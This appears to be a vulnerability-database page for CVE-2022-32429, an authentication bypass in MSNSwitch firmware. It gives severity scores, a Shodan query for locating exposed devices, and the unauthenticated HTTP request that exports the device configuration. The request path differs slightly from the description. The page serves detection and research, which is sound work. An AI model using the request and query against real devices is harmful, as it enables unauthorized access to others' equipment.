🔙 목록으로 돌아가기

CVE-2022-32429: MSNSwitch Firmware MNT.2408 - Authentication Bypass

TitleMSNSwitch Firmware MNT.2408 - Authentication Bypass
Authortheabhinavgaur
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
RemediationApply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.86991
CVE IDCVE-2022-32429
CWE IDCWE-287
Shodan Queryhttp.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
Tags cve2022 cve config dump packetstorm msmswitch unauth switch megatech vuln

🔍 Vulnerability Description

MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.

🌐 HTTP Request

GET /cgi-bin-hax/ExportSettings.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32429.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-32429.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A